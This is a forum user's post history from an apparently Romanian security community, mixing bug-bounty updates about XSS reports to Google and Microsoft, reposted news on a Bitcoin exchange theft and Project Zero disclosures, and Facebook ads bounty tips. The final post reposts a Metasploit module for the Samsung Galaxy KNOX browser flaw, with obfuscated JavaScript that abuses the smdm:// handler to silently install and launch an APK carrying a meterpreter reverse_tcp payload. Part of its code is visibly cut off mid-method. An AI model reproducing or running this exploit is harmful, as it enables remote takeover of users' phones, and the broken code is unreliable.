akkiliON
-
Posts
1177 -
Joined
-
Last visited
-
Days Won
46
Posts posted by akkiliON
-
-
Update:
SpoilerHello,
Thank you for reporting this bug. As part of Google's Vulnerability Reward Program, the panel has decided to issue a reward of $5000.00.
Important: if you aren't registered with Google as a supplier, p2p-vrp@google.com will reach out to you. If you have registered in the past, no need to do it again - sit back and relax, and we will process the payment soon.
If you have any payment related requests, please direct them to p2p-vrp@google.com. Please remember to include the subject of this email and the email address that the report was sent from.
Regards,
Google Security Bot-
9
-
-
Update:
QuoteHi,
Nice catch! I've filed a bug based on your report. The panel will evaluate it at the next VRP panel meeting and we'll update you once we've got more information. All you need to do now is wait. If you don't hear back from us in 2-3 weeks or have additional information about the vulnerability, let us know!
-
2
-
-
Salutare tuturor,
A trecut ceva timp de când n-am mai postat ce am găsit pe aici.
Am găsit un XSS reflected în https://pay.google.com. Din păcate, merge doar pe Internet Explorer 11 din cauză că browser-ul nu suportă CSP-ul. Partea bună, este că vulnerabilitatea pe care am găsit-o a fost validată.
Cam atât pot spune în momentul de față. Numai bine.
-
7
-
-
English | ISBN-13: 978-1466592612 | 532 pages | PDF | 23 MB
In this book, web security expert Wu Hanqing reveals how hackers work and explains why companies of different scale require different security methodologies. With in-depth analysis of the reasons behind the choices, the book covers client script security, server applications security, and Internet company security operations. It also includes coverage of browser security, cross sites script attacks, click jacking, HTML5/PHP security, injection attacks, authentication, session management, access control, web frame security, DDOS, leaks, Internet transactions security, and the security development lifecycle.
-
Happy birthday @M2G !
-
La mul?i ani !
-
1
-
-
Un prieten de-al meu a gasit un SQL Injection si a primit duplicate.
Am raportat si eu un XSS (Flash), dar degeaba. Am primit duplicate.
-
Felicit?ri, ?i-au validat problema ?
-
La mul?i ani.
-
Al doilea l-am raportat si eu acum 2 luni si ceva. Nu raspund ratatii.
-
Even as Bitcoin is starting to shake things up in the US, all is not well in the cryptocurrency world. China-based Bitcoin exchange Bter was hacked on Valentine’s Day and $1.75 million worth of Bitcoin was stolen.
The company hasn’t revealed much about the breach, except that 7,170 BTC was taken from its cold (offline) wallet on February 14 via a single transaction (link) and that the platform is suspending operations until further notice.
The company has offered a bounty of 720 BTC – about $170,000 – for the retrieval of the stolen currency. It says it will arrange withdrawals of unaffected funds at a later date.
This is the second major Bitcoin hack in the past two months. Slovenian exchange Bitstamp lost about $5 million worth of currency in January but has since resumed service. More positively, Coinbase launched the first US Bitcoin exchange last month, ahead of the launch of Lunar, a competitor backed by the Winklevoss twins.
It’s likely that this year’s debate around Bitcoin will center more on security than whether businesses or individuals choose to adopt the currency.
Source: $1.75 Million in Bitcoin Stolen from Chinese Exchange Bter
-
Felicitari. Spune mi te rog, cea de la Microsoft, a fost prin post sau get?
Request-ul se f?cea prin POST Method.
-
Am zis c? n-are rost s? mai creez un alt topic. Vreau doar s? spun c? am g?sit un XSS Stored în portal.office.com (Microsoft), care se putea exploata. Am fost recompensat cu 1500$ + un loc in Hall of Fame. Vulnerabilitatea a fost fixat?.
-
Microsoft has heavily criticized Google and its 90-days security disclosure policy after the firm publicly revealed two zero-day vulnerabilities in Microsoft’s Windows 8.1 operating system one after one just days before Microsoft planned to issue a patch to kill the bugs. But, seemingly Google don't give a damn thought.
Once again, Google has publicly disclosed a new serious vulnerability in Windows 7 and Windows 8.1 before Microsoft has been able to produce a patch, leaving users of both the operating systems exposed to hackers until next month, when the company plans to deliver a fix.
DISCLOSURE OF UNPATCHED BUGS, GOOD OR BAD?
Google’s tight 90-days disclosure policy seems to be a good move for all software vendors to patch their products before they get exploited by the hackers and cybercriminals. But at the same time, disclosing all critical bugs along with its technical details in the widely used operating system like Windows 7 and 8 doesn’t appears to be a right decision either. In both cases, the only one to suffer is the innocent users.
The revelation of the security flaw was also a part Google's Project Zero, an initiative that identifies security holes in different software and calls on companies to publicly disclose and patch bugs within 90 days of discovering them.
Chris Betz, senior director of the Microsoft Security Response Center, that Google’s move "feels less like principles and more like a ‘gotcha’, with customers the one who may suffer as a result." He continues, "What’s right for Google is not always right for customers. We urge Google to make protection of customers our collective primary goal."This time the search engine giant has discovered a flaw in the CryptProtectMemory memory-encrypting function found within Windows 7 and 8.1 and presents in both 32- and 64-bit architectures, which can accidentally disclose sensitive information or allow a miscreant to bypass security checks, apparently.
MICROSOFT WILL DELIVER PATCH IN FEB, 2015
Google first notified Microsoft of the vulnerability in Windows 7 and 8.1 on October 17, 2014. Microsoft then confirmed the security issues on October 29 and said that its developers managed to reproduce the security hole. The patch for the vulnerability is scheduled for Feb. 10, next Patch Tuesday.
The vulnerability was found by James Forshaw, who also discovered a "privilege elevation flaw" in Windows 8.1, which was disclosed earlier this week and drew strong criticism from Microsoft. The newly discovered bug actually resides in the CNG.sys implementation, which failed to run proper token checks.
"The issue is the implementation in CNG.sys doesn't check the impersonation level of the token when capturing the logon session ID (using SeQueryAuthenticationIdToken) so a normal user can impersonate at Identification level and decrypt or encrypt data for that logon session," James Forshaw says in the post disclosing the vulnerability.This is third time in less than a month when the Google’s Project Zero released details of the vulnerability in Microsoft’s operating system, following its 90-day public disclosure deadline policy. Few days ago, Google released details of a new privilege escalation bug in Microsoft's Windows 8.1 operating system just two days before Microsoft planned to patch the bug.
Google vs. Microsoft — Google reveals Third unpatched Zero-Day Vulnerability in Windows - Hacker News
-
Stai lini?tit, nu m-am pensionat
-
Nu, înc? nici nu e fixat? problema.
-
- Vulnerabilitate: Cross-site-scripting stored
- Autor: akkiliON
- Raportat? si validat?. Se poate exploata, nu e self.
- Dovad?:
-
1
- Vulnerabilitate: Cross-site-scripting stored
-
Download: 92.58 MB/s
Upload: 92.66 MB/s
ISP: RDS & RCS
-
Shit happens.
Take a look: https://hackerone.com/reports/12685
-
Starting today and extending through the end of 2014, all Whitehat bugs in our ads code will receive double bounties. We recently completed a comprehensive security audit of this area ourselves. We found and fixed a number of security bugs but would like to encourage additional scrutiny from Whitehats to see what we might have missed. Also, since the vast majority of bug reports we work on with the Whitehat community are focused on the more common parts of Facebook code, we hope to encourage researchers to become more familiar with the surface area of ads to better protect the businesses that use them. Below are some tips for successfully finding bugs in ads code.
Here is a sampling of past Whitehat bugs in ads that we've fixed:
- Redeeming the same ads coupon multiple times without expiry.
- Retrieving the name of an unpublished Page via the Ads Create Tool by guessing its Page ID.
- Arbitrary local file read via a .zip symlink (more details in this post)
- Injecting JavaScript into an ads report email and then leveraging a CSRF bug to make a victim send a malicious email to a target on your behalf.
Ads can be organized into a few sections:
UI - The UI is made up of our old and new Ads Manager tools (at /ads/manage/), as well as the JavaScript-based Power Editor tool that supports bulk ad edits and uploads. Most of the serious Whitehat bugs in this area have surfaced around permissions, viewing ads, or parts of an ad that is not yours.
Ads API (https://developers.facebook.com/docs/ads-api) - The documentation for this frequently used API is a good introduction to the describe components of ads: a user ID, a campaign, an account, creative and so on. While not present in the ads API itself, the following writeup describes an excellent bug of the type that might be found in there: Hacking Facebook’s Legacy API, Part 1: Making Calls on Behalf of Any User.
Analytics, also called insights - Analytics is what measures the performance of an ad, how well the ads are performing, and so on. Like with UI, the bugs we've seen in this area that had the largest impact have been missing or incorrect permissions checks. For example, we had an issue where someone could access insights for any application via a Graph API token with the read_insights permission.
Everything else - There is a lot of backend code to correctly target, deliver, bill and measure ads. This code isn't directly reachable via the website, but of the small number of issues that have been found in these areas, they are relatively high impact.
At this stage of our bug bounty program, it's uncommon for us to see many of the common web security bugs like XSS. What we see more often are things like missing or incorrect permissions checks, insufficient rate-limiting that can lead to scraping, edge-case CSRF issues, and problems with SWFs.
Ads-related code is the main part of Facebook that has and enforces roles, so it's also worthwhile to understand them: https://www.facebook.com/help/289207354498410. Among these roles, the permissions for reading or writing billing information are the most relevant.
The best way to report an issue is to use your Whitehat test account: https://www.facebook.com/whitehat/accounts/. Good luck, and keep the submissions coming!
Surs?: https://www.facebook.com/notes/protect-the-graph/doubling-up-on-ads-code-bounties/1519314984975314
-
1
- Redeeming the same ads coupon multiple times without expiry.
-
A fost frumos challenge-ul.
A?tept ?i urm?torul.
-
-
Doar câteva minute au trecut de când am v?zut la TV.
-
This Metasploit module exploits a vulnerability that exists in the KNOX security component of the Samsung Galaxy firmware that allows a remote webpage to install an APK with arbitrary permissions by abusing the 'smdm://' protocol handler registered by the KNOX component. The vulnerability has been confirmed in the Samsung Galaxy S4, S5, Note 3, and Ace 4.
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'digest/md5'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::BrowserExploitServer
# Hash that maps payload ID -> (0|1) if an HTTP request has
# been made to download a payload of that ID
attr_reader :served_payloads
def initialize(info = {})
super(update_info(info,
'Name' => 'Samsung Galaxy KNOX Android Browser RCE',
'Description' => %q{
A vulnerability exists in the KNOX security component of the Samsung Galaxy
firmware that allows a remote webpage to install an APK with arbitrary
permissions by abusing the 'smdm://' protocol handler registered by the KNOX
component.
The vulnerability has been confirmed in the Samsung Galaxy S4, S5, Note 3,
and Ace 4.
},
'License' => MSF_LICENSE,
'Author' => [
'Andre Moulu', # discovery and advisory
'joev' # msf module
],
'References' => [
['URL', 'http://blog.quarkslab.com/abusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerability.html'],
['OSVDB', '114590']
],
'Platform' => 'android',
'Arch' => ARCH_DALVIK,
'DefaultOptions' => { 'PAYLOAD' => 'android/meterpreter/reverse_tcp' },
'Targets' => [ [ 'Automatic', {} ] ],
'DisclosureDate' => 'Nov 12 2014',
'DefaultTarget' => 0,
'BrowserRequirements' => {
:source => 'script',
:os_name => OperatingSystems::Match::ANDROID
}
))
register_options([
OptString.new('APK_VERSION', [
false, "The update version to advertise to the client", "1337"
])
], self.class)
deregister_options('JsObfuscate')
end
def exploit
@served_payloads[req.qstring['id']].to_s, 'Content-type' => 'text/plain')
elsif req.uri =~ /launch$/
send_response_html(cli, launch_html)
else
super
end
end
# The browser appears to be vulnerable, serve the exploit
def on_request_exploit(cli, req, browser)
print_status "Serving exploit..."
send_response_html(cli, generate_html)
end
def magic_headers
{ 'Content-Length' => apk_bytes.length,
'ETag' => Digest::MD5.hexdigest(apk_bytes),
'x-amz-meta-apk-version' => datastore['APK_VERSION'] }
end
def generate_html
%Q|
<!doctype html>
<html><body>
<script>
#{exploit_js}
</script></body></html>
|
end
def exploit_js
payload_id = rand_word
js_obfuscate %Q|
function poll() {
var xhr = new XMLHttpRequest();
xhr.open('GET', '_poll?id=#{payload_id}&d='+Math.random()*999999999999);
xhr.onreadystatechange = function(){
if (xhr.readyState == 4) {
if (xhr.responseText == '1') {
setTimeout(killEnrollment, 100);
} else {
setTimeout(poll, 1000);
setTimeout(enroll, 0);
setTimeout(enroll, 500);
}
}
};
xhr.onerror = function(){
setTimeout(poll, 1000);
setTimeout(enroll, 0);
};
xhr.send();
}
function enroll() {
var loc = window.location.href.replace(/[/.]$/g, '');
top.location = 'smdm://#{rand_word}?update_url='+
encodeURIComponent(loc)+'/#{payload_id}.apk';
}
function killEnrollment() {
top.location = "intent://#{rand_word}?program="+
"#{rand_word}/#Intent;scheme=smdm;launchFlags=268468256;end";
setTimeout(launchApp, 300);
}
function launchApp() {
top.location='intent:view#Intent;SEL;component=com.metasploit.stage/.MainActivity;end';
}
enroll();
setTimeout(poll,600);
|
end
def rand_word
Rex::Text.rand_text_alphanumeric(3+rand(12))
end
endSource: Samsung Galaxy KNOX Android Browser Remote Code Execution ? Packet Storm
Fun stuff
in Discutii non-IT
Posted